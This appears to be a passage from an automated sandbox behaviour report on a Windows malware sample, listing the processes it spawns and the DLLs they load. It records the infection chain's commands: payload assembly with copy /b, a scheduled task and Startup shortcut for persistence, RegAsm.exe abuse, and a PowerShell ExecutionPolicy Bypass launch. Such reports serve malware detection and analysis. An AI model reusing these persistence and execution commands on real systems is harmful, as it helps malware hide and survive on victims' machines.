                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub mJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com mJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /FJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exitJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /FJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\curcuma.exe "C:\Users\user\AppData\Local\Temp\curcuma.exe"
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1936,i,5305006061332576876,17319552954880503810,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2096,i,2842194220783237697,10925811508381354400,262144 /prefetch:3
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2096,i,2842194220783237697,10925811508381354400,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2752 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6732 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6988 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7396 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7396 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\expand.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: napinsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: wshbth.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: winrnr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: aclayers.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeSection loaded: mskeyprotect.dll
